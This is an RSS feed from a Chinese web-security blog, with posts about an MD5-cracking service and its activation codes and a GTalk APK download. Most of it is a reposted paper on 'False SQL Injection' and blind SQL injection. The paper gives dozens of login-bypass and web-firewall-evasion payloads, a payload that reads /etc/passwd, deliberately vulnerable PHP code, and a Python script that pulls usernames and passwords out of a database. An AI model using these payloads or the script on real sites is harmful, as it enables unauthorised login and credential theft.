<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>0x50sec.org</title>
	<atom:link href="http://www.0x50sec.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.0x50sec.org</link>
	<description>Focus on web security!</description>
	<lastBuildDate>Fri, 13 Jan 2012 09:23:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>Md5破解会员注册和激活码说明</title>
		<link>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e4%bc%9a%e5%91%98%e6%b3%a8%e5%86%8c%e5%92%8c%e6%bf%80%e6%b4%bb%e7%a0%81%e8%af%b4%e6%98%8e/</link>
		<comments>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e4%bc%9a%e5%91%98%e6%b3%a8%e5%86%8c%e5%92%8c%e6%bf%80%e6%b4%bb%e7%a0%81%e8%af%b4%e6%98%8e/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 09:23:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1234</guid>
		<description><![CDATA[Md5破解现在仍然免费,只是采用了会员制度. 所以没必要注册多个帐号. 注册暂时开放了,访问 会员注册 页面会自动生成一个激活码. 该激活码内有一定数量的所谓&#8221;金币&#8221;. 该激活码可以用于新帐号注册,不能用于已有帐号充值. 如何获得可用于充值的激活码: 可通过以下方式的任何一种获取可用于充值的激活码(50-5000不等) 1. 在您的博客\空间等做上 md5 破解板块的 友情链接 ,并且截图发送到管理员邮箱 2.提交建议被采纳 3.提交bug被采纳 4.别的方法我没想好的 5.提交成功率髙的字典 6.也可以赞助本站获得激活码 以上方式请通过如下邮箱联系管理员 : root@0x50sec.org 为什么改成这样的? 节约资源,或者其他just for fun~~~ &#160;]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.0x50sec.org/md5/" target="_blank">Md5破解</a><strong>现在仍然免费,只是采用了会员制度.</strong></p>
<p>所以没必要注册多个帐号.</p>
<p>注册暂时开放了,访问 <a href="http://www.0x50sec.org/md5/register.php" target="_blank">会员注册</a> 页面会自动生成一个激活码.</p>
<p>该激活码内有一定数量的所谓&#8221;金币&#8221;.</p>
<p>该激活码可以用于新帐号注册,不能用于已有帐号充值.</p>
<p><strong>如何获得可用于充值的激活码:</strong></p>
<p>可通过以下方式的<strong>任何一种</strong>获取可用于充值的激活码(50-5000不等)</p>
<p>1. 在您的博客\空间等做上 md5 破解板块的 友情链接 ,并且截图发送到管理员邮箱</p>
<p>2.提交建议被采纳</p>
<p>3.提交bug被采纳</p>
<p>4.别的方法我没想好的</p>
<p>5.提交成功率髙的字典</p>
<p>6.也可以赞助本站获得激活码</p>
<p>以上方式请通过如下邮箱联系管理员 : root@0x50sec.org</p>
<p>为什么改成这样的?</p>
<p>节约资源,或者其他just for fun~~~</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e4%bc%9a%e5%91%98%e6%b3%a8%e5%86%8c%e5%92%8c%e6%bf%80%e6%b4%bb%e7%a0%81%e8%af%b4%e6%98%8e/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>md5破解改版</title>
		<link>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e6%94%b9%e7%89%88/</link>
		<comments>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e6%94%b9%e7%89%88/#comments</comments>
		<pubDate>Thu, 12 Jan 2012 08:26:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[md5]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1226</guid>
		<description><![CDATA[好久没写博客鸟,新年新气象,将md5破解的页面重新做了下. 新增了md5(md5($pass))、md5(md5($pass).$salt) (discuz)等加密方式的破解。 小站资源有限决定对占用资源的部分进行会员制度。 会员注册需要使用邀请码。 先发放20个. -::激活码                                                        -::金额 2ad454b95d23576cdf33a9f4337922f4     50 再放20个 -::激活码                                                        -::金额 f4cf60f1f153cd710234cd65586296fb     100 4170f1b65b74a7918808393a8656b586     100 38f29aa54cede433a1fb63a8c6f40155     100 5fac5f3e22162d24c56d24f5d34d4574     100 1fafa5d98086085949f87a4fdaf4e162     100 c215d6af0192225d7e1708f0c9d1be93     100 a355c4f9af46d5b79f09719a90637de2     100 1b8baf24d244328ef829ae142a1b15ae     100 05c18d05fc2d4c2040e451d4b3db4d38     100 [...]]]></description>
			<content:encoded><![CDATA[<p>好久没写博客鸟,新年新气象,将<a title="md5在线破解" href="http://www.0x50sec.org/md5/">md5破解</a>的页面重新做了下.</p>
<p>新增了md5(md5($pass))、md5(md5($pass).$salt) (discuz)等加密方式的破解。</p>
<p>小站资源有限决定对占用资源的部分进行会员制度。</p>
<p>会员注册需要使用邀请码。</p>
<p>先发放20个.</p>
<p>-::激活码                                                        -::金额</p>
<p><span style="color: #00ff00;"> 2ad454b95d23576cdf33a9f4337922f4     50</span></p>
<p>再放20个</p>
<p>-::激活码                                                        -::金额</p>
<p><span style="color: #00ff00;">f4cf60f1f153cd710234cd65586296fb     100 </span><br />
<span style="color: #00ff00;">4170f1b65b74a7918808393a8656b586     100 </span><br />
<span style="color: #00ff00;">38f29aa54cede433a1fb63a8c6f40155     100 </span><br />
<span style="color: #00ff00;">5fac5f3e22162d24c56d24f5d34d4574     100 </span><br />
<span style="color: #00ff00;">1fafa5d98086085949f87a4fdaf4e162     100 </span><br />
<span style="color: #00ff00;">c215d6af0192225d7e1708f0c9d1be93     100 </span><br />
<span style="color: #00ff00;">a355c4f9af46d5b79f09719a90637de2     100 </span><br />
<span style="color: #00ff00;">1b8baf24d244328ef829ae142a1b15ae     100 </span><br />
<span style="color: #00ff00;">05c18d05fc2d4c2040e451d4b3db4d38     100 </span><br />
<span style="color: #00ff00;">af6947164fe453dbdcd681fed91e4150     100 </span><br />
<span style="color: #00ff00;">89a4f54e31c81ea8f6246aed150bd4f1     100 </span><br />
<span style="color: #00ff00;">1a5f3d314552341461bfb906ff10b520     100 </span><br />
<span style="color: #00ff00;">9c49fe1f93b6e9bc4aca5a95d5547f53     100 </span><br />
<span style="color: #00ff00;">5a5983e93af81f7d6edadbec35e08d6a     100 </span><br />
<span style="color: #00ff00;">309ff64f2f208e1384de0208b83a34de     100 </span><br />
<span style="color: #00ff00;">5976218171de77b9a4f2198a0fbe4665     100 </span><br />
<span style="color: #00ff00;">86395fc102c3d625001ff88bba85647b     100 </span><br />
<span style="color: #00ff00;">a2e08390a33f10e0c6f95d7c4ff9eef7     100 </span><br />
<span style="color: #00ff00;">cf4d7b1d13da30e2fdeff40755aaaad5     100 </span><br />
<span style="color: #00ff00;">ed6bf6d3c103ea4022730be2a4abc09c     100 </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/md5%e7%a0%b4%e8%a7%a3%e6%94%b9%e7%89%88/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>False SQL Injection and Advanced Blind SQL Injection</title>
		<link>http://www.0x50sec.org/false-sql-injection-and-advanced-blind-sql-injection/</link>
		<comments>http://www.0x50sec.org/false-sql-injection-and-advanced-blind-sql-injection/#comments</comments>
		<pubDate>Thu, 22 Dec 2011 12:51:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1220</guid>
		<description><![CDATA[http://www.exploit-db.com/papers/18263/ False SQL Injection and Advanced Blind SQL Injection ######################################################################### #                                    # # Exploit Title: False SQL injection and advanced blind SQL injection    # # Date: 21/12/2011                            # # Author: wh1ant                            # # Company: trinitysoft    [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>http://www.exploit-db.com/papers/18263/</p>
<p>False SQL Injection and Advanced Blind SQL Injection</p>
<p>#########################################################################<br />
#                                    #<br />
# Exploit Title: False SQL injection and advanced blind SQL injection    #<br />
# Date: 21/12/2011                            #<br />
# Author: wh1ant                            #<br />
# Company: trinitysoft                            #<br />
# Group: secuholic                            #<br />
#                                    #<br />
#       ###                                       ##           #<br />
#     ######                                    ######         #<br />
#    ##    ##                                  ###   ##        #<br />
#           ##                                ##               #<br />
#            ###                            ###                #<br />
#             ###                          ###                 #<br />
#              ###   #                #   ###                  #<br />
#                ############   ###########                    #<br />
#               ############################                   #<br />
#              ##############################                  #<br />
#              #############################                   #<br />
#             # ############################ #                 #<br />
#              # ####   ############   #### #                  #<br />
#               # #####  ##########  ##### #                   #<br />
#                # ###################### ##                   #<br />
#                ## #################### ##                    #<br />
#                 ## ################## ##                     #<br />
#                # ## ################ ## #                    #<br />
#                 # ## ############## ## #                     #<br />
#                 ## ## ############ ## ##                     #<br />
#              ## ## ########## ## ##                      #<br />
#                    # ## ######## ## #                        #<br />
#                       ## ###### ##                           #<br />
#                        ## #### ##                            #<br />
#                         ## ## ##                             #<br />
#                        ##      ##                            #<br />
#                        ##      ##                            #<br />
#                         ###  ###                   #<br />
#                                    #<br />
#########################################################################</p>
<p>This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage.</p>
<p>In order to read this document, you have to understand basic MySQL principles. I classified the term &#8220;SQL Injection&#8221; as 2 meanings. The first is a general SQL Injection, we usually call this &#8220;True SQL Injection&#8221;, and the second is a &#8220;False SQL Injection&#8221;. Though in this documentation, you can know something special about &#8220;True SQL Injection&#8221;</p>
<p>And I mean to say it&#8217;s true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in &#8220;Blind SQL Injection&#8221;. A tested environment was as follow.</p>
<p>ubuntu server    11.04<br />
mysql        5.1.54-1<br />
Apache        2.2.17<br />
PHP        5.3.5-1</p>
<p>A tested code was as follow.</p>
<p>&lt;?php</p>
<p>/*<br />
create database injection_db;<br />
use injection_db;<br />
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));</p>
<p>insert into users values(1, &#8216;admin&#8217;, &#8216;ad1234&#8242;);<br />
insert into users values(2, &#8216;wh1ant&#8217;, &#8216;wh1234&#8242;);<br />
insert into users values(3, &#8216;secuholic&#8217;, &#8216;se1234&#8242;);</p>
<p>*** login.php ***<br />
*/</p>
<p>if(empty($_GET['id']) || empty($_GET['password'])){<br />
echo &#8220;&lt;html&gt;&#8221;;<br />
echo &#8220;&lt;body&gt;&#8221;;<br />
echo &#8220;&lt;form name=&#8217;text&#8217; action=&#8217;login.php&#8217; method=&#8217;get&#8217;&gt;&#8221;;<br />
echo &#8220;&lt;h4&gt;ID&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;input type=&#8217;text&#8217; name=&#8217;id&#8217;&gt;&lt;br&gt;&#8221;;<br />
echo &#8220;PASS&lt;input type=&#8217;password&#8217; name=&#8217;password&#8217;&gt;&lt;br&gt;&lt;/h4&gt;&#8221;;<br />
echo &#8220;&lt;input type=&#8217;submit&#8217; value=&#8217;Login&#8217;&gt;&#8221;;<br />
echo &#8220;&lt;/form&gt;&#8221;;<br />
echo &#8220;&lt;/body&gt;&#8221;;<br />
echo &#8220;&lt;/html&gt;&#8221;;<br />
}</p>
<p>else{<br />
$id = $_GET['id'];<br />
$password = $_GET['password'];</p>
<p>$dbhost = &#8216;localhost&#8217;;<br />
$dbuser = &#8216;root&#8217;;<br />
$dbpass = &#8216;pass&#8217;;<br />
$database = &#8216;injection_db&#8217;;</p>
<p>$db = mysql_connect($dbhost, $dbuser, $dbpass);<br />
mysql_select_db($database,$db);<br />
$sql = mysql_query(&#8220;select * from users where id=&#8217;$id&#8217; and password=&#8217;$password&#8217;&#8221;) or die (mysql_error());</p>
<p>$row = mysql_fetch_array($sql);</p>
<p>if($row[id] &amp;&amp; $row[password]){<br />
echo &#8220;&lt;font color=#FF0000&gt;&lt;h1&gt;&#8221;.&#8221;Login sucess&#8221;.&#8221;&lt;/h1&gt;&lt;/u&gt;&lt;br&gt;&#8221;;<br />
echo &#8220;&lt;h3&gt;&lt;font color=#000000&gt;&#8221;.&#8221;Hello, &#8220;.&#8221;&lt;/u&gt;&#8221;;<br />
echo &#8220;&lt;font color=#D2691E&gt;&#8221;.$row[id].&#8221;&lt;/u&gt;&lt;/h3&gt;&lt;br&gt;&#8221;;<br />
}<br />
else{<br />
echo &#8220;&lt;script&gt;alert(&#8216;Login failed&#8217;);&lt;/script&gt;&#8221;;<br />
}<br />
mysql_close($db);<br />
}</p>
<p>?&gt;</p>
<p>First, basic SQL Injection is as follow.<br />
&#8216; or 1=1#</p>
<p>The code above is general SQL Injection Code, and this writer classified the code as &#8220;True SQL Injection&#8221;. When you log on to some site, in internal of web program, your id and password are identified by some statement used &#8220;select id, password from table where id=&#8221; and password=&#8221;, you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process.</p>
<p>&#8216;=0#</p>
<p>We can apply it in a different way.</p>
<p>This is possible as 0&gt;-1<br />
&#8216;&gt;-1#</p>
<p>Also, this is possible as 0&lt;1<br />
&#8216;&lt;1#</p>
<p>You don&#8217;t have to use only single figures. You can use two figures attack as follow.<br />
1&#8242;&lt;99#</p>
<p>Comparison operation 0=1 will be 0, the following operation result is true because of id=&#8221;=0(0=1).</p>
<p>&#8216;=0=1#</p>
<p>Additionally there is some possible comparison operation making the same value each other.</p>
<p>&#8216;&lt;=&gt;0#</p>
<p>Like this, if you use the comparison operation, you can attack as additional manner.</p>
<p>&#8216;=0=1=1=1=1=1#<br />
&#8216;=1&lt;&gt;1#<br />
&#8216;&lt;&gt;1#<br />
1&#8242;&lt;&gt;99999#<br />
&#8216;!=2!=3!=4#</p>
<p>In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL.</p>
<p>mysql&gt; select * from users;<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
| num | id        | password |<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
|   1 | admin     | ad1234   |<br />
|   2 | wh1ant    | wh1234   |<br />
|   3 | secuholic | se1234   |<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
3 rows in set (0.01 sec)</p>
<p>This shows the contents in any table without any problem.<br />
The following is the content when you don&#8217;t input any value in the id</p>
<p>mysql&gt; select * from users where id=&#8221;;<br />
Empty set (0.00 sec)</p>
<p>Of course there is not result because id field dosen&#8217;t have any string.<br />
In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true.</p>
<p>mysql&gt; select * from users where id=0;<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
| num | id        | password |<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
|   1 | admin     | ad1234   |<br />
|   2 | wh1ant    | wh1234   |<br />
|   3 | secuholic | se1234   |<br />
+&#8212;&#8211;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br />
3 rows in set (0.00 sec)</p>
<p>If you input 0 in id, All the content is showed. This is the basic about &#8220;False SQL Injection&#8221;. After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise  operations and arithmetic operations.</p>
<p>Once I&#8217;ll show bitwise operation example.</p>
<p>Or bitwise operation is well known for any programmer. And as I told you before, &#8221; is 0, if you operate &#8220;0 bitwise OR 0&#8243;, the result is 0. So the following operation succeed log on as the False SQL Injection.<br />
&#8216;|0#</p>
<p>Naturally, you can use AND operation.<br />
&#8216;&amp;0#</p>
<p>This is the attack using XOR<br />
&#8216;^0#</p>
<p>Also using shift operation is enable.<br />
&#8216;&lt;&lt;0#<br />
&#8216;&gt;&gt;0#</p>
<p>If you apply like those bitwise operations, you can use variable attack methods.<br />
&#8216;&amp;&#8221;#<br />
&#8216;%11&amp;1#<br />
&#8216;&amp;1&amp;1#<br />
&#8216;|0&amp;1#<br />
&#8216;&lt;&lt;0|0#<br />
&#8216;&lt;&lt;0&gt;&gt;0#</p>
<p>In this time, I will show &#8220;False SQL Injection&#8221; using arithmetic operations.<br />
If the result is 0 using arithmetic operation with &#8221;, attack will be success. The following is the example using arithmetic operation.</p>
<p>&#8216;*9#<br />
Multiplication</p>
<p>&#8216;/9#<br />
Division.</p>
<p>&#8216;%9#<br />
Mod</p>
<p>&#8216;+0#<br />
Addition</p>
<p>&#8216;-0#<br />
Subtraction</p>
<p>Significant point is that the result has to be under one. Also you can attack as follow.<br />
&#8216;+2+5-7#<br />
&#8216;+0+0-0#<br />
&#8216;-0-0-0-0-0#<br />
&#8216;*9*8*7*6*5#<br />
&#8216;/2/3/4#<br />
&#8216;%12%34%56%78#<br />
&#8216;/**/+/**/0#<br />
&#8216;&#8212;&#8211;0#<br />
&#8216;+++0+++++0*0#</p>
<p>Next attack is it using fucntion. In this document, I can&#8217;t show all the functions. Because this attack is not difficult, you can use the &#8220;True, False SQL Injection&#8221; attack with function as much as you want. And whether this attack is &#8220;True SQL Injection&#8221; or &#8220;False SQL Injection&#8221; is decided on the last operation after return of function.<br />
&#8216;&lt;hex(1)#<br />
&#8216;=left(0&#215;30,1)#<br />
&#8216;=right(0,1)#<br />
&#8216;!=curdate()#<br />
&#8216;-reverse(0)#<br />
&#8216;=ltrim(0)#<br />
&#8216;&lt;abs(1)#<br />
&#8216;*round(1,1)#<br />
&#8216;&amp;left(0,0)#<br />
&#8216;*round(0,1)*round(0,1)#</p>
<p>Also, you can use attack using space in function name. But you are able to use the space with only some function.<br />
&#8216;=upper     (0)#</p>
<p>In this time, SQL keyword is method. This method is also decided as True or False Injection according to case.<br />
&#8216; &lt;1 and 1#<br />
&#8216;xor 1#<br />
&#8216;div 1#<br />
&#8216;is not null#<br />
admin&#8217; order by&#8217;<br />
admin&#8217; group by&#8217;<br />
&#8216;like 0#<br />
&#8216;between 1 and 1#<br />
&#8216;regexp 1#</p>
<p>Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, &#8211;, /**/, so the method is more effective in the Web Firewalls.<br />
ID  : &#8216;=&#8217;<br />
PASS: &#8216;=&#8217;</p>
<p>ID  : &#8216;&lt;&gt;&#8217;1<br />
PASS: &#8216;&lt;&gt;&#8217;1</p>
<p>ID  : &#8216;&gt;1=&#8217;<br />
PASS: &#8216;&gt;1=&#8217;</p>
<p>ID  : 0&#8242;=&#8217;0<br />
PASS: 0&#8242;=&#8217;0</p>
<p>ID  : &#8216;&lt;1 and 1&gt;&#8217;<br />
PASS: &#8216;&lt;1 and 1&gt;&#8217;</p>
<p>ID  : &#8216;&lt;&gt;ifnull(1,2)=&#8217;1<br />
PASS: &#8216;&lt;&gt;ifnull(1,2)=&#8217;1</p>
<p>ID  : &#8216;=round(0,1)=&#8217;1<br />
PASS: &#8216;=round(0,1)=&#8217;1</p>
<p>ID  : &#8216;*0*&#8217;<br />
PASS: &#8216;*0*&#8217;</p>
<p>ID  : &#8216;+&#8217;<br />
PASS: &#8216;+&#8217;</p>
<p>ID  : &#8216;-&#8217;<br />
PASS: &#8216;-&#8217;</p>
<p>ID  :&#8217;+1-1-&#8217;<br />
PASS:&#8217;+1-1-&#8217;</p>
<p>All attacks used in the documentation will be more effective with using bracket when detouring web firewall.<br />
&#8216;+(0-0)#<br />
&#8216;=0&lt;&gt;((reverse(1))-(reverse(1)))#<br />
&#8216;&lt;(8*7)*(6*5)*(4*3)#<br />
&#8216;&amp;(1+1)-2#<br />
&#8216;&gt;(0-100)#</p>
<p>Let&#8217;s see normal SQL Injection attack.<br />
&#8216; or 1=1#</p>
<p>If this is translated in hexdemical, the result is as follow.</p>
<p>http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&#038;password=1234</p>
<p>Like attack above is basically filtered. So that&#8217;s not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09.</p>
<p>The possible values are as follow.<br />
%09<br />
%0a<br />
%0b<br />
%0c<br />
%0d<br />
%a0<br />
%23%0a<br />
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a</p>
<p>The following is the example using %a0 instead of %20.</p>
<p>http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&#038;password=1234</p>
<p>In this time, I will show &#8220;Blind SQL injection&#8221; attack, this attack can&#8217;t detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject.</p>
<p>The following attack code can be used on log on page. And the page will show id and password.<br />
&#8216;union select 1,group_concat(password),3 from users#</p>
<p>This attack code brings /etc/password information.<br />
&#8216;union select 1,load_file(0x2f6574632f706173737764),3 from users#</p>
<p>Dare I say it without union select statement using Blind SQL injection with and operation is possible.</p>
<p>The result of record are three.<br />
admin&#8217; and (select count(*) from users)=3#</p>
<p>Let&#8217;s attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection.</p>
<p>&lt;?php</p>
<p>/*** info.php ***/</p>
<p>$n = $_GET['num'];<br />
if(empty($n)){<br />
$n = 1;<br />
}</p>
<p>$dbhost = &#8216;localhost&#8217;;<br />
$dbuser = &#8216;root&#8217;;<br />
$dbpass = &#8216;root&#8217;;<br />
$database = &#8216;injection_db&#8217;;</p>
<p>$db = mysql_connect($host, $dbuser, $dbpass);<br />
mysql_select_db($database,$db);<br />
$sql = mysql_query(&#8220;select * from `users` where num=&#8221;.$n) or die (mysql_error());<br />
$info = @mysql_fetch_row($sql);<br />
echo &#8220;&lt;body bgcolor=#000000&gt;&#8221;;<br />
echo &#8220;&lt;h1&gt;&lt;font color=#FFFFFF&gt;wh1ant&lt;/font&gt;&#8221;;<br />
echo &#8220;&lt;font color=#2BF70E&gt; site for blind SQL injection test&lt;/h1&gt;&lt;br&gt;&#8221;;<br />
echo &#8220;&lt;h1&gt;&lt;font color=#2BF70E&gt;num: &lt;/font&gt;&lt;font color=#D2691E&gt;&#8221;.$info[0].&#8221;&lt;/font&gt;&lt;/h1&gt;&#8221;;<br />
echo &#8220;&lt;h1&gt;&lt;font color=#2BF70E&gt;user: &lt;/font&gt;&lt;font color=#D2691E&gt;&#8221;.$info[1].&#8221;&lt;/font&gt;&#8221;;<br />
echo &#8220;&lt;body&gt;&#8221;;<br />
mysql_close($db);</p>
<p>?&gt;</p>
<p>Basic Blind SQL Injection is as follow on like above.</p>
<p>http://127.0.0.1/info.php?num=1 and 1=0<br />
http://127.0.0.1/info.php?num=1 and 1=1</p>
<p>But using = operation is possible for Blind SQL Injection.</p>
<p>http://192.168.137.129/info.php?num=1=0</p>
<p>http://192.168.137.129/info.php?num=1=1</p>
<p>Also other operation is possible naturally.</p>
<p>http://127.0.0.1/info.php?num=1&lt;&gt;0</p>
<p>http://127.0.0.1/info.php?num=1&lt;&gt;1</p>
<p>http://127.0.0.1/info.php?num=1&lt;0</p>
<p>http://127.0.0.1/info.php?num=1&lt;1</p>
<p>http://127.0.0.1/info.php?num=1*0*0*1</p>
<p>http://127.0.0.1/info.php?num=1*0*0*0</p>
<p>http://127.0.0.1/info.php?num=1%1%1%0</p>
<p>http://127.0.0.1/info.php?num=1%1%1%1</p>
<p>http://127.0.0.1/info.php?num=1 div 0<br />
http://127.0.0.1/info.php?num=1 div 1</p>
<p>http://127.0.0.1/info.php?num=1 regexp 0<br />
http://127.0.0.1/info.php?num=1 regexp 1</p>
<p>http://127.0.0.1/info.php?num=1^0</p>
<p>http://127.0.0.1/info.php?num=1^1</p>
<p>Attack example:<br />
http://127.0.0.1/info.php?num=0^(locate(0&#215;61,(select id from users where num=1),1)=1)<br />
http://127.0.0.1/info.php?num=0^(select position(0&#215;61 in (select id from users where num=1))=1)<br />
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)<br />
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)<br />
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)<br />
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)</p>
<p>http://127.0.0.1/info.php?num=0^(id=0x61646d696e)</p>
<p>http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)<br />
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)</p>
<p>If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a.</p>
<p>#!/usr/bin/python</p>
<p>### blind.py ###</p>
<p>import urllib<br />
import sys<br />
import os</p>
<p>def put_data(true_url, true_result, field, index, length):<br />
for i in range(1, length+1):<br />
for j in range(32, 127):<br />
attack_url = true_url + &#8220;^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)&#8221; % (j,field,index,i,i)<br />
attack_open = urllib.urlopen(attack_url)<br />
attack_result = attack_open.read()<br />
attack_open.close()</p>
<p>if attack_result==true_result:<br />
ch = &#8220;%c&#8221; % j<br />
sys.stdout.write(ch)<br />
break<br />
print &#8220;\t\t&#8221;,</p>
<p>def get_length(false_url, false_result, field, index):<br />
i=0<br />
while 1:<br />
data_length_url = false_url + &#8220;^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)&#8221; % (field,index,i)<br />
data_length_open = urllib.urlopen(data_length_url)<br />
data_length_result = data_length_open.read()<br />
data_length_open.close()<br />
if data_length_result==false_result:<br />
return i<br />
i+=1</p>
<p>url = &#8220;http://127.0.0.1/info.php&#8221;</p>
<p>true_url = url + &#8220;?num=1&#8243;<br />
true_open = urllib.urlopen(true_url)<br />
true_result = true_open.read()<br />
true_open.close()</p>
<p>false_url = url + &#8220;?num=0&#8243;<br />
false_open = urllib.urlopen(false_url)<br />
false_result = false_open.read()<br />
false_open.close()</p>
<p>print &#8220;num\t\tid\t\tpassword&#8221;<br />
fields = &#8220;num&#8221;, &#8220;id&#8221;, &#8220;password&#8221;</p>
<p>for i in range(1, 4):<br />
for j in range(0, 3):<br />
length = get_length(false_url, false_result, fields[j], i)<br />
length = put_data(false_url, true_result, fields[j], i, length)<br />
print &#8220;&#8221;</p>
<p>To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack.</p>
<p># Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt</p>
<p>[EOF]</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/false-sql-injection-and-advanced-blind-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>htc chacha (G16) 的gtalk</title>
		<link>http://www.0x50sec.org/htc-chacha-g16-%e7%9a%84gtalk/</link>
		<comments>http://www.0x50sec.org/htc-chacha-g16-%e7%9a%84gtalk/#comments</comments>
		<pubDate>Thu, 10 Nov 2011 09:32:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工具代码]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[gtalk]]></category>
		<category><![CDATA[htc chacha]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1213</guid>
		<description><![CDATA[刚玩android，买了个低端的机器，htc chacha 全键盘感觉还是不错，唯一的遗憾就是没gtalk但我偏偏喜欢gtalk的简洁，国行和很多经典版的rom都没有带gtalk客户端，就在别的rom里提取了system/app目录下提取了apk文件，装上果然可以用。 网上找了半天都没找到～～～，有同样想装gtalk的不妨下载安装试试。 下载地址: Talk]]></description>
			<content:encoded><![CDATA[<p>刚玩android，买了个低端的机器，htc chacha 全键盘感觉还是不错，唯一的遗憾就是没gtalk但我偏偏喜欢gtalk的简洁，国行和很多经典版的rom都没有带gtalk客户端，就在别的rom里提取了system/app目录下提取了apk文件，装上果然可以用。</p>
<p>网上找了半天都没找到～～～，有同样想装gtalk的不妨下载安装试试。</p>
<p>下载地址: <a href="http://www.0x50sec.org/wp-content/uploads/2011/11/Talk.zip">Talk</a></p>
<p><a href="http://www.0x50sec.org/wp-content/uploads/2011/11/2011-11-10_13-33-37.jpg"><img class="aligncenter size-full wp-image-1214" title="2011-11-10_13-33-37" src="http://www.0x50sec.org/wp-content/uploads/2011/11/2011-11-10_13-33-37.jpg" alt="" width="480" height="320" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/htc-chacha-g16-%e7%9a%84gtalk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>黑客组织与毒贩集团对峙取胜 被绑成员获释</title>
